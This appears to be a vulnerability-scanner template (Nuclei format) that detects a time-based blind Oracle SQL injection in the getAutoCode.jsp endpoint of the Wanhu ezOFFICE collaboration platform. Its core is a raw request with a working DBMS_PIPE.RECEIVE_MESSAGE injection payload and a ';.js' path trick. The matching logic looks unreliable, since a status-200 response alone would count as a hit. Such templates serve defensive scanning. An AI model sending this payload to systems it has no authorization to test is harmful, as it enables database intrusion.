id: 万户 ezOFFICE协同管理平台 getAutoCode SQL注入

info:
  name: 万户 ezOFFICE协同管理平台 getAutoCode SQL注入
  author: admin
  severity: high
  description: Detects an Oracle SQL injection vulnerability by exploiting timing-based blind SQL injection using DBMS_PIPE.RECEIVE_MESSAGE.
  tags: oracle,sql,injection,timing

requests:
  - raw:
      - |
        GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2' AND 6205=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(66)||CHR(90)||CHR(108),8)-- YJdO&field=field_name&tabName=tfield HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Connection: close

    attack: sniper

    extractors:
      - type: regex
        part: body
        name: response-time
        regex:
          - (?i)(?=.*error)(?=.*dbms_pipe.receive_message)

    matchers:
      - type: word
        words:
          - "8 seconds"
        condition: and

      - type: status
        status:
          - 200

    matchers-condition: or